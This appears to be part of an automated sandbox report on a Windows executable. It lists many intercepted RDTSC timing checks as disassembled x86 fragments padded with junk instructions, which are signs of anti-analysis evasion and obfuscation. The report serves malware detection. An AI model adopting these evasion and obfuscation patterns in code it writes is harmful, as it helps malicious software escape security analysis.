Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A901C8 second address: A901D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F45B11B2366h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A90319 second address: A9031D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9031D second address: A90323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A90453 second address: A90478 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007F45B187B8D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F45B187B8E1h 0x00000013 jns 00007F45B187B8D6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A90478 second address: A90492 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F45B11B2366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F45B11B236Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A90492 second address: A904AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F45B187B8E1h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A908DE second address: A908E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A908E6 second address: A90919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jbe 00007F45B187B8D6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F45B187B8E0h 0x00000014 popad 0x00000015 jbe 00007F45B187B8E8h 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push edx 0x0000001f pop edx 0x00000020 pop edx 0x00000021 pushad 0x00000022 push edi 0x00000023 pop edi 0x00000024 push esi 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9638E second address: A963C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F45B11B2391h 0x0000000e jmp 00007F45B11B2376h 0x00000013 jmp 00007F45B11B2375h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A966A0 second address: A966A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A96BE5 second address: A96BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A96BEE second address: A96BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F45B187B8D6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A96E7C second address: A96E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F45B11B2372h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A96E97 second address: A96EA1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F45B187B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A96EA1 second address: A96EC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F45B11B2379h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A971B5 second address: A971D8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F45B187B8D6h 0x00000008 ja 00007F45B187B8D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F45B187B8E3h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A97D0A second address: A97D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2374h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9BC89 second address: A9BC8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9BC8D second address: A9BC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9BC93 second address: A9BCB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C18F second address: A9C1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F45B11B2366h 0x0000000a jmp 00007F45B11B236Ah 0x0000000f popad 0x00000010 jnl 00007F45B11B236Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C1B2 second address: A9C1CC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F45B187B8E1h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C311 second address: A9C31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F45B11B2366h 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C31F second address: A9C32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 jl 00007F45B187B8DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C488 second address: A9C48C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C629 second address: A9C637 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C78E second address: A9C794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA10AD second address: AA10E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push ebx 0x0000000b push edx 0x0000000c je 00007F45B187B8D6h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F45B187B8D6h 0x0000001b jmp 00007F45B187B8DBh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA7AC6 second address: AA7AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45B11B236Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA7DAA second address: AA7DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F45B187B8E3h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA80BB second address: AA80BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA8366 second address: AA836A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA836A second address: AA837B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jno 00007F45B11B2366h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA837B second address: AA8380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA8380 second address: AA839E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45B11B2379h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA850D second address: AA8516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB211B second address: AB211F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2297 second address: AB229B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB229B second address: AB229F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB246C second address: AB2470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE45D second address: ABE477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2376h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE477 second address: ABE47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE47D second address: ABE49A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F45B11B2366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007F45B11B2366h 0x00000011 jmp 00007F45B11B236Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE49A second address: ABE4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABDD6F second address: ABDD8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F45B11B2374h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABDD8C second address: ABDDA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F45B187B8D6h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F45B187B8D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABDF37 second address: ABDF3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABDF3F second address: ABDF49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F45B187B8D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABDF49 second address: ABDF7F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F45B11B2370h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F45B11B2375h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F45B11B2366h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABDF7F second address: ABDF9F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F45B187B8D6h 0x00000008 jmp 00007F45B187B8E3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABDF9F second address: ABDFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jp 00007F45B11B2366h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2AB8 second address: AC2AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F45B187B8E5h 0x0000000c popad 0x0000000d pushad 0x0000000e jp 00007F45B187B8DEh 0x00000014 js 00007F45B187B8D8h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007F45B187B8D6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD031B second address: AD032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F45B11B2366h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD032A second address: AD0356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DDh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F45B187B8E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD0356 second address: AD0389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F45B11B2379h 0x0000000f jmp 00007F45B11B236Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD01B8 second address: AD01BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD8162 second address: AD81C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F45B11B237Ch 0x0000000f jmp 00007F45B11B2370h 0x00000014 jbe 00007F45B11B2366h 0x0000001a jmp 00007F45B11B2376h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F45B11B236Eh 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD81C5 second address: AD81D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jc 00007F45B187B8D6h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD81D4 second address: AD81E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B11B236Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD81E5 second address: AD81E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD8605 second address: AD8609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD8792 second address: AD87AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F45B187B8E4h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD8915 second address: AD891B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD891B second address: AD891F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD891F second address: AD893E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2375h 0x00000007 jp 00007F45B11B2366h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD893E second address: AD8949 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F45B187B8D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDFFA second address: ADDFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDFFE second address: ADE00D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F45B187B8D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE00D second address: ADE018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE018 second address: ADE01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE19E second address: ADE1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE1A7 second address: ADE1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DBh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B17FC6 second address: B17FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B289F2 second address: B289F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A527 second address: B2A552 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F45B11B236Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A552 second address: B2A562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F45B187B8D6h 0x0000000a jc 00007F45B187B8D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2CE08 second address: B2CE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2CE0E second address: B2CE1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007F45B187B8D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2CE1F second address: B2CE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEFE4D second address: BEFE6D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007F45B187B8E7h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0290 second address: BF0294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0294 second address: BF029A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF065B second address: BF0665 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F45B11B2366h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0665 second address: BF066B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF066B second address: BF0670 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0670 second address: BF067A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF095A second address: BF0967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0ABF second address: BF0AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 ja 00007F45B187B8D6h 0x0000000c jns 00007F45B187B8D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0BE5 second address: BF0BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F45B11B2366h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0BF4 second address: BF0BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0BF8 second address: BF0BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0BFC second address: BF0C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 jng 00007F45B187B8D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF5323 second address: BF5327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF5327 second address: BF5331 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F45B187B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF5331 second address: BF5365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2375h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F45B11B2377h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF5365 second address: BF5369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF53EE second address: BF53F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF53F2 second address: BF548E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F45B187B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007F45B187B8E0h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F45B187B8D8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dl, 77h 0x0000002f sub dword ptr [ebp+122D17CFh], eax 0x00000035 push 00000004h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F45B187B8D8h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Bh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 or edx, dword ptr [ebp+122D1BDCh] 0x00000057 call 00007F45B187B8D9h 0x0000005c jmp 00007F45B187B8E4h 0x00000061 push eax 0x00000062 je 00007F45B187B8DEh 0x00000068 push ecx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
